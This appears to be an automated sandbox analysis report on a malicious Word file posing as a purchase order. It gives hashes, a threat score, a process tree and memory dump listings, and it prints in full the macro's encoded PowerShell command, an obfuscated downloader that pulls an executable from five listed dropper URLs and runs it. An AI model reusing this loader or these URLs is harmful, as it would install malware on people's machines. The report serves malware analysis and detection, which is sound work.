69c925d0b4cc3466d99f6c8615dd15051c3e9a79c22914e3766cdb69590979f2

Analysis

max time kernel
0s
max time network
131s
platform
windows11-21h2_x64
resource
win11-20231215-en
resource tags

arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
submitted
03/01/2024, 19:39

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

PO-465514-180820.doc
Size

174KB
MD5

d7e6921bfd008f707ba52dee374ff3db
SHA1

833bf5524a745a315c083067f2cbbf037fa35d56
SHA256

044aa7e93ec81b297b53aaebad9bbac1a9d754219b001aaf5d4261665af30bc7
SHA512

12a527967ad448075519fb57954b1c2cab1f049de042309b9554c689cf4d0f8e99226cbb1e7dd41d9379914b3aaf75f51785573860f77662495d44e6539dfe9a
SSDEEP

3072:fNw4PrXcuQuvpzm4bkiaMQgAlSKQg0g3Vwse:bDRv1m4bnQgISKQg0gFwse

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://52550750-56-20180826151453.webstarterz.com/savewayexpressthai.com/jnze_2o3j_k/

exe.dropper

http://oubaina.com/wp-includes/lqkz_nvr_1avf4/

exe.dropper

https://www.msbc.kz/data/k527_5_cbdvv5bi19/

exe.dropper

http://okcupidating.com/im/fsq_esj_qgx060p/

exe.dropper

http://bike-nomad.com/cgi-bin/7n_0x0_62mnzyh9q/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1404	1856	powersheLL.exe	14

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PO-465514-180820.doc" /o ""
1⤵
PID:4100

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABPAGcAbwB1AF8ANQAxAD0AKAAnAFEAdAA3ACcAKwAnADEAJwArACcAdABsADUAJwApADsALgAoACcAbgBlACcAKwAnAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQARQBOAFYAOgB0AEUAbQBwAFwATwBGAEYASQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIARQBjAHQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAEMAVQByAGkAVAB5AGAAUAByAE8AVABgAE8AQwBgAE8AbAAiACAAPQAgACgAJwB0ACcAKwAnAGwAcwAxADIAJwArACcALAAgACcAKwAnAHQAbABzACcAKwAnADEAMQAsACAAdABsAHMAJwApADsAJABRAGEAawBmAG8AMABxACAAPQAgACgAJwBaADAAJwArACcAZgB2ADMAawBiAGcAJwApADsAJABCAHIAdgAzADUAcgBzAD0AKAAnAEUANgBoACcAKwAnADQAJwArACcAbgBrAG4AJwApADsAJABFAGMAOQB3ADQAZQAwAD0AJABlAG4AdgA6AHQAZQBtAHAAKwAoACgAJwBOACcAKwAnADMAcABPACcAKwAnAGYAZgBpAGMAZQAyADAAMQA5AE4AMwAnACsAJwBwACcAKQAuACIAcgBlAGAAUABsAGAAQQBjAEUAIgAoACcATgAzAHAAJwAsAFsAcwBUAHIAaQBOAGcAXQBbAEMASABhAFIAXQA5ADIAKQApACsAJABRAGEAawBmAG8AMABxACsAKAAnAC4AZQB4ACcAKwAnAGUAJwApADsAJABaAF8AagBqAGkAMwBtAD0AKAAnAE8AZwBwADUAJwArACcANwB3ACcAKwAnAGoAJwApADsAJABZADcAagBtAHgAegA4AD0AJgAoACcAbgBlAHcALQAnACsAJwBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAHcAZQBiAGMATABJAEUAbgB0ADsAJABJAG4AbgBlAHcAYwBfAD0AKAAnAGgAdAB0AHAAJwArACcAOgAnACsAJwAvACcAKwAnAC8ANQAnACsAJwAyACcAKwAnADUAJwArACcANQAnACsAJwAwACcAKwAnADcANQAwAC0ANQAnACsAJwA2ACcAKwAnAC0AMgAwADEAOAAwADgAMgAnACsAJwA2ADEANQAxACcAKwAnADQANQAnACsAJwAzACcAKwAnAC4AdwBlACcAKwAnAGIAcwB0AGEAcgB0AGUAJwArACcAcgB6ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBzAGEAJwArACcAdgAnACsAJwBlAHcAYQB5AGUAeABwAHIAZQBzAHMAdABoAGEAaQAnACsAJwAuACcAKwAnAGMAbwBtAC8AagAnACsAJwBuACcAKwAnAHoAZQBfADIAbwAnACsAJwAzAGoAXwBrAC8AKgBoAHQAdAAnACsAJwBwADoALwAvAG8AdQBiAGEAaQBuAGEALgAnACsAJwBjACcAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGkAJwArACcAbgBjAGwAdQBkACcAKwAnAGUAcwAnACsAJwAvAGwAcQBrAHoAXwBuACcAKwAnAHYAcgBfACcAKwAnADEAYQAnACsAJwB2AGYANAAvACoAaAAnACsAJwB0ACcAKwAnAHQAcABzADoALwAnACsAJwAvAHcAdwB3AC4AbQBzAGIAYwAnACsAJwAuAGsAegAnACsAJwAvAGQAYQB0AGEALwBrACcAKwAnADUAJwArACcAMgA3AF8ANQAnACsAJwBfAGMAYgAnACsAJwBkAHYAdgA1AGIAaQAxADkALwAqAGgAdAB0AHAAOgAvAC8AbwAnACsAJwBrACcAKwAnAGMAJwArACcAdQAnACsAJwBwAGkAJwArACcAZABhAHQAaQBuAGcALgBjACcAKwAnAG8AbQAnACsAJwAvACcAKwAnAGkAbQAvACcAKwAnAGYAcwBxACcAKwAnAF8AZQAnACsAJwBzACcAKwAnAGoAJwArACcAXwAnACsAJwBxACcAKwAnAGcAJwArACcAeAAwADYAJwArACcAMABwAC8AKgAnACsAJwBoAHQAdABwADoALwAvACcAKwAnAGIAJwArACcAaQBrAGUALQBuAG8AbQAnACsAJwBhAGQALgBjAG8AbQAvAGMAZwBpAC0AJwArACcAYgAnACsAJwBpACcAKwAnAG4ALwA3AG4AXwAwACcAKwAnAHgAJwArACcAMABfADYAMgBtACcAKwAnAG4AegAnACsAJwB5ACcAKwAnAGgAJwArACcAOQAnACsAJwBxAC8AJwApAC4AIgBzAFAAYABsAEkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEYAZQA4AG4AZQBnADQAPQAoACcASwAnACsAJwB5ACcAKwAnAG0AcgB3ADkAdwAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABNAHMAdQBvAG4AaAA4ACAAaQBuACAAJABJAG4AbgBlAHcAYwBfACkAewB0AHIAeQB7ACQAWQA3AGoAbQB4AHoAOAAuACIARABvAFcAYABOAEwAbwBBAGQAYABGAGkAYABMAEUAIgAoACQATQBzAHUAbwBuAGgAOAAsACAAJABFAGMAOQB3ADQAZQAwACkAOwAkAFUAaQAzAGwANAA5AGcAPQAoACcARABvACcAKwAnAGgAeABiACcAKwAnAHoAZwAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJACcAKwAnAHQAZQBtACcAKQAgACQARQBjADkAdwA0AGUAMAApAC4AIgBsAEUAbgBnAGAAVABoACIAIAAtAGcAZQAgADMAMQA0ADUAMQApACAAewAmACgAJwBJAG4AdgBvACcAKwAnAGsAJwArACcAZQAtAEkAdABlAG0AJwApACgAJABFAGMAOQB3ADQAZQAwACkAOwAkAEMAdwBpAG8AXwBoADUAPQAoACcARQAnACsAJwA2AHYAcAA3AHYAdwAnACkAOwBiAHIAZQBhAGsAOwAkAFQAYQB5ADUAMABsAGsAPQAoACcAUABoADEAMABnACcAKwAnAGIAMQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUANwB0AG0AbgBrADQAPQAoACcAWQBlAHcAYwB3ACcAKwAnADgAJwArACcAawAnACkA
1⤵
- Process spawned unexpected child process
PID:1404

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1404-72-0x0000021AC14D0000-0x0000021AC14F2000-memory.dmp

Filesize
136KB

Download
memory/1404-83-0x00007FF9E0C60000-0x00007FF9E1722000-memory.dmp

Filesize
10.8MB

Download
memory/1404-76-0x00007FF9E0C60000-0x00007FF9E1722000-memory.dmp

Filesize
10.8MB

Download
memory/1404-78-0x0000021AD97D0000-0x0000021AD97E0000-memory.dmp

Filesize
64KB

Download
memory/1404-79-0x0000021AD97D0000-0x0000021AD97E0000-memory.dmp

Filesize
64KB

Download
memory/1404-77-0x0000021AD97D0000-0x0000021AD97E0000-memory.dmp

Filesize
64KB

Download
memory/4100-21-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-2-0x00007FF9CD810000-0x00007FF9CD820000-memory.dmp

Filesize
64KB

Download
memory/4100-23-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-22-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-1-0x00007FF9CD810000-0x00007FF9CD820000-memory.dmp

Filesize
64KB

Download
memory/4100-19-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-17-0x00007FF9CAC70000-0x00007FF9CAC80000-memory.dmp

Filesize
64KB

Download
memory/4100-18-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-14-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-12-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-11-0x00007FF9CAC70000-0x00007FF9CAC80000-memory.dmp

Filesize
64KB

Download
memory/4100-10-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-8-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-30-0x00000228DFF70000-0x00000228E0170000-memory.dmp

Filesize
2.0MB

Download
memory/4100-6-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-5-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-50-0x00000228DDC30000-0x00000228DEC00000-memory.dmp

Filesize
15.8MB

Download
memory/4100-4-0x00007FF9CD810000-0x00007FF9CD820000-memory.dmp

Filesize
64KB

Download
memory/4100-3-0x00007FF9CD810000-0x00007FF9CD820000-memory.dmp

Filesize
64KB

Download
memory/4100-24-0x00007FFA0C700000-0x00007FFA0C7BD000-memory.dmp

Filesize
756KB

Download
memory/4100-0-0x00007FF9CD810000-0x00007FF9CD820000-memory.dmp

Filesize
64KB

Download
memory/4100-20-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-16-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-15-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-13-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-9-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-7-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-86-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-87-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-88-0x00000228DFF70000-0x00000228E0170000-memory.dmp

Filesize
2.0MB

Download
memory/4100-92-0x00000228DDC30000-0x00000228DEC00000-memory.dmp

Filesize
15.8MB

Download
memory/4100-116-0x00007FFA0D780000-0x00007FFA0D989000-memory.dmp

Filesize
2.0MB

Download
memory/4100-115-0x00007FF9CD810000-0x00007FF9CD820000-memory.dmp

Filesize
64KB

Download
memory/4100-117-0x00007FFA0C700000-0x00007FFA0C7BD000-memory.dmp

Filesize
756KB

Download
memory/4100-114-0x00007FF9CD810000-0x00007FF9CD820000-memory.dmp

Filesize
64KB

Download
memory/4100-113-0x00007FF9CD810000-0x00007FF9CD820000-memory.dmp

Filesize
64KB

Download
memory/4100-112-0x00007FF9CD810000-0x00007FF9CD820000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads